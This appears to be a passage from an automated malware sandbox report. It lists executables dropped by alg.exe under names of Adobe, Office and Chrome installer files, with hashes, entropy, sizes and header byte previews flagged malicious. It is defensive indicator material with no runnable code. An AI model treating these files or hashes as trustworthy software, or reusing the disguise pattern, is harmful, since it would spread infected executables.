                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:49152:/UZujDjDjDjXmXgoz2PsapFQrC7dRpqbeE8U2IzwDt+bdro4O8b8ITDnlggyJ1kN:cWmXL6DEC7dRpKuDQbgZD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:F48143AFAA351C7C42B89D489CE6C8D8
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:0D9560CA52CCC561BF5120D5C9C6DEAB9DDAD740
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:4D132564FAF8D8B0CDF8B9D408BEBE56BF0AFB90DF2CB68FBF0F2E88BE6179E8
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:D93E4EB3F4F0422063FA44C819DED2979E7D699AA533F856D894F405E540F7F057A01861B6A16BF19C7CA66D6345337CE8430B0FA649CF6972A9860B4836937E
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........I.~.(g-.(g-.(g-.Cd,.(g-.Cb,i(g-.G.-.(g-b\c,.(g-b\d,.(g-.t.-.(g-.(g-C(g-b\b,.(g-.Cc,.(g-.Ca,.(g-.Cf,.(g-.(f-.+g-`\b,.(g-`\g,.(g-`\.-.(g-.(.-.(g-`\e,.(g-Rich.(g-........PE..L......d.........."......./..p......P"%.......0...@...........................R.......R..............................@:......@:.......;..V...........................^6.T...................._6.....h.5.@.............0...... :.`....................text...*./......./................. ..`.rdata..Ze....0..f....0.............@..@.data....E....:......h:.............@....didat........;......B;.............@....rsrc....V....;..X...H;.............@..@.reloc...P...@G..@....F.............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):3163136
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.972781289619796
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:98304:arZ23AbsK6Ro022JjL2WEiVqJZqD527BWG:UJADmmxL2WEoCZqVQBWG
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:0014863E425337244D8C2D7313962C62
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:C89DED1A60E8E13E7602D857678740EC672DE750
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:0D518DD3FE53BB88A5D8DC11BA8B0C8ACFD94133DDC4460CDF5CF7747F852672
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:557D8D7DB85037E052822E5039F267CE3DD20ACE1E763CBCA9BBF1E72A11E6FC59CB35A06D97F5A98937C74C5D486647526892FEB0174B18E04266F62836C49F
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5{.!q..rq..rq..rq..r...rQc.r`..rQc.r`..rQc.rp..rQc.rp..rRichq..r........................PE..L.....A.................~... .......^... ........... ........................1......0.......... .....................................0............................!............................................... ...............................text....|... ...~.................. ..`.data...............................@....rsrc...../......./.................@...................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1213440
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.204926318607787
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:6frYY42wd7hlOw9fpkEE647sqjnhMgeiCl7G0nehbGZpbD:Dz9xrSvDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:051889B5E455992AFC94930852A52E97
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:095A0A115A1C1FF24C667F786D33B5A1494CBF93
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:AABC840842C69470CFAFD9A3A29CEA836DEDF0ECB85580D7EA1FB2047EDE34CA
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:BC45A57DA256A660FB6957F17FF13D694935191347FC2D2BB7908870590AE309F8A066D0BE716AA14F518A2007DBACF7343D057792DB3D97FA5041A73013242D
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......T...T...T...U...T...U...T..U...T..U...T...U...T..U...T...U...T...Tf..T..U...T..T...T..uT...T..U...TRich...T................PE..d.....{d..........#......J...........3.........@............................. ........... ..................................................L.......`..........(J..................p...T.......................(... B..8............`.......I..`....................text....H.......J.................. ..`.rdata..d....`.......N..............@..@.data...(w...p...&...^..............@....pdata..(J.......L..................@..@.didat.......@......................@..._RDATA.......P......................@..@.rsrc........`......................@...................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1388544
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.272936443145657
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:WwkNKiZ+R2GGNUbTF5oXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/T:WzNKUE5osqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:F6E16646EC8FDC1257293726E7746FF7
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:7141D7CF5BA6D788B71157543EAF5F5F9EB48A90
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:04574A64C941AE64D16CFB687A92AE5226CC688C18F048E5682262C38AFF0A76
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:1EDEE99F755B945053F29915ED9D78D95FD50A0CCED2CD5DF8B05C1ABBBDD4606A9D3183CCE610E735BF544B2249221D47FC46404250FE0E7810053E44A0BA5E
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E@..$...$...$...\...$...V*..$...V-..$...V+..$...V/..$...$/.0 ...V&..$...V..$...V..$...V,..$..Rich.$..........PE..d...!!.R.........."......`..........0C.........@.............................P............ .......... ......................................Xl..........X.......d.......................T...................8...(.......8...........`...`............................text...(X.......`.................. ..`.rdata..z....p... ...p..............@..@.data...............................@....pdata..d........ ..................@..@.rsrc...X...........................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):5855744
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.574338028005656
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:98304:ZALuzDKnxCp3JKNrPJzruaI6HMaJTtGbVD527BWG:iaGg3cFPIaI6HMaJTtGbVVQBWG
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:319820604D2FEE2C0C0B8CF35675A8EB
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:86F58977E609F6C200ABDD0EC964ADFBC868A562
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:91A0D695A2B3D8742029173E4BF95147C276534AF45E95DD8C129451819EAD74
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:B31DA3515BAFD25AC403722352F23E55687B4CBC30DEAEF3D80097D215DA9C1F7B57B1CE6DAC46CA582AE826B97340DE32538ACB94098EF06E9D3A810132D139
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......Jc.M.............p......nx......nx......).......)........p.......p.......p..&....p..............nx..i...kx......kx......kx..g...kxx.............kx......Rich....................PE..d....".e..........".... .z6..........32........@..............................Y.......Z... .................................................8.B.......K..a...PI..%..................0.B.8...................X.B.(.....7.@.............6.0.....B......................text....y6......z6................. ..`.rdata..5.....6......~6.............@..@.data...`....0G.......G.............@....pdata...%...PI..&...:I.............@..@.didat.. .....K......`K.............@..._RDATA..\.....K......fK.............@..@.rsrc....a....K..b...hK.............@..@.reloc........P.......O.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1312768
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.356044040310824
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:mXr/SVMxWHsqjnhMgeiCl7G0nehbGZpbD:O1xqDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:953A2973BAEF29244EE7B31300E8AE80
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:EF522D5F8CB9611A97862DA5C60736A8B4F9B7A1
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:AEF6AB5A6F97B26214AEFAAF62AB4F29CF3F63D836041C1904F0466F9775BF9E
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:18B02DCB8F7DDC8CF5FCC399CD73293E5E2324301DB55F096C89C75A93EA31C8DABEEA4620461A29C1DD40EDF14E65304EA9CB0A2BEC3E64B1AFE8251CB08106
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.k...k...k.......k.......k.......k.......k...k..Ro.......k....l..k.......k....n..k.......k..Rich.k..........PE..L...9.A/.....................T......@V............@..........................P......8............ ......................................8............................_..T...............................@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...8...........................@..@.reloc...p.......`..................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):27533312
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.248637380215837
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:196608:phRrmpGpGdJM7Hbp8JfrCGvqYYuNDmoefAlprtPz25HqaI6HMaJTtGbQOJVQBWG:phRCpGpMJMrbp8JjpNdNlc5rB
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:B4131BC8905AE0EE30A36D226F4DA63B
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:54D13102784CEB6B99851F7DAF7CE05D56976E7D
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:9D3C084D7AEA6D750AE43D54BDD0E6393AA9DB59E8B18B2484B4033EDD53C86F
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:8C449F315A8FB1BF9E44CECA98DCDF5B0B6474AE53A8F5402DC0EAF753EA247CA125AEC513B847DC15B0F8B0F0545702D23B91DBF226E01401405AF4C7A3596C
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......$.|+`{.x`{.x`{.xi..xv{.x...yf{.x...yj{.x...yd{.x...yO{.xG..xh{.xG.oxa{.x...yb{.x...ya{.x...ya{.x...yd{.x...yc{.x...y~{.x...y}{.x`{.xTs.x...ya{.x...yjz.x...y v.x...xa{.x`{.xa{.x...ya{.xRich`{.x........PE..d......e..........".... .....H.................@...................................../.... ..................................................u..D.... ?...X...7.........................8....................U..(...`...@............0.. "..l .......................text............................... ..`.rdata..S.~..0....~.................@..@.data.........1.......0.............@....pdata........7.......7.............@..@.didat..`.....>.......>.............@....detourc.!....>.."....>.............@..@.rsrc.....X.. ?...X...>.............@..@.reloc..............................@...........................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2199552
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.789011918050217
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:49152:S83pZ3kd0CuEeN0LUmRXzYs65mhDmg27RnWGj:OKuUQY15+D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:D680143B65903DD34514BAC84FDB2187
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:EED317D3F1D6C97AABAFBB39D99697CA7D27F0D4
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:088F971B3A9B392D4DB16A797D7CB9B98134A80EDA25CE64183AD2DBF395681E
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:0042F9F44D0051DF84078EA7EE6EE32124968577A90C7AF145AA8E4E0CE601D65C8736F6BE8CBBE304C1784146A945F8C8A1DC0577DF3B2DBB529DFB47D82BE2
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D................7......................!..............~............Y.......[............Rich............PE..d...rq............"..................$.........@..............................!......!... .......... ......................................P...|....p... ......L....................a..T...................Xt..(... s..8............t...............................text...6........................... ..`.rdata..............................@..@.data...@...........................@....pdata..L...........................@..@.rsrc.... ...p...0...P..............@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):4971008
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.670844982788862
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:49152:UErw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGOpndOPcptz6+M8:CA4oGlcR+glEdOPKzgVZ7D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:6D0922C7F75431EFED93F39D8E382EB3
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:E86854C403A509A9F737988C1B2438026C3DE4C4
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:EF8A23FD8525EA3F9F82C716810ADBC19CC89526E7B30951B7692CB71A91528E
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:3B99173858172A8A519F9456BD0C1068FF9E5DC22E3F70B11426742D49479438CC48B952B6DE341E1B70E49D98B0F595E9507297AD01FD3E98B81F29FB0D7807
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Eh.<..{o..{o..{o.q.o..{oaszn..{oas~n*.{oas.n..{oasxn..{o.{}n..{o.{xn..{o.{.n..{o.{zn..{o..zo..{odsxn..{ods~n..{odsrnF.{ods.o..{o...o..{odsyn..{oRich..{o........PE..d...0m.d..........".... ..-.........0p+........@..............................L.......L... .................................................HZ:.......B.......@.<C....................:.8...................p.9.(... P..@.............-......H:.@....................text...[.-.......-................. ..`.rdata..9.....-.......-.............@..@.data...x....`>......>>.............@....pdata..<C....@..D....@.............@..@.didat..`.....B......LB.............@....rsrc.........B......PB.............@..@.reloc........B......ZB.............@...........................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):4897792
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.829764451234003
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:49152:Z8ErLqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgK3:Gv2gM+qwXLg7pPgw/DSZlvD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:BAE98CEB265740E54B788F875FC87836
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:C9668FCF0F25E0CD822107643044CF4C20823193
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:27B11E9B4DF932AA2F7CD8B646F25B56587DA3EDB3D5957DAC49C91D27251615
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:6127F9BE25C9B10B7B17E710209E86EEB7AE73A131404A3303173D6DACC7BD403CCD0F9FB2E8B9BF3A41F4D51D59BDE5B49DF9941C3A211017E39E0F0DEFA9AD
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......D/......... ..........@..............................L......K... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):4897792
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.829769312056469
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:49152:98ErLqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgK3:iv2gM+qwXLg7pPgw/DSZlvD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:60BD046E0EE9778E79C422BAC3CFC470
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:1271F7A25645BD3B7821767CCB983DB73B874D4C
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:D564F36F66CD3EEAD97267360CBF3BE406DFD0B6E241D7944A5B44E5FD9B19B6
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:123433F3E2618E41A9CEEE26F6A0AFF96A1D361B110CC78F0CF3757A60844E6CC037F2FE9949B1629A844F48EDBA4D023CD0084C13A587D90D064E423CB5D359
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......D/......... ..........@..............................L.....>.K... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2156544
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.953591012845516
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:wtjqL8fH+8aUbp8D/8+xJWA/sqjnhMgeiCl7G0nehbGZpbD:8jKK+81FI/8oZDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:C78F68FBCC2D10C7582E94426592A083
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:BBC43FEAA3221B3A4511D91D7E4521E53C4688BB
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:43E748B124B14F8097E0F1B1F837F73EF4DCB13E5532AABBAAB96EE89AA37F4D
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:80F5BF4897B149B4D7DC584DA2FF56EAF4A843FF5A5D2B843D68831A80503E45A8B28BA842DC1508965C8DF8D883699A3CCFBCB6BE00F5ED65A58C22A1D97BD1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......F.....................@.............................P"......!... ..........................................X..\...$Y....... ...&......(...................lM......................PL..(...pr..@............_...............................text....D.......F.................. ..`.rdata..$....`.......J..............@..@.data...,.... ......................@....pdata..(...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h............................ ..`.rsrc....&... ...(..................@..@.reloc.......P......................@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2370560
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.03240003276524
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:49152:OAMsOu3JfCIGnZuTodRFYKBrFIbWpvDmg27RnWGj:OAMa38ZuTSJD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:4E136F59B9901A823452006B9329B8BB
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:D8CD62CFF4FABEE723A11E54C08B49328FD037F8
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:FBB8BB0BF6D20F2D7334BAE8267E2B1F77638E1F0C2CA703B2116CDD255F6A30
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:FDBA68F5A2DE8FED25C49C6FD27BC3CD834B71FDE96BBEE2CABF5AF27EC14257026A7939D2EEE673C3369D319B349373DB40AAB2B63F4D90E2B7C692A6A03750
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................0..........@..............................%......B$... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1984512
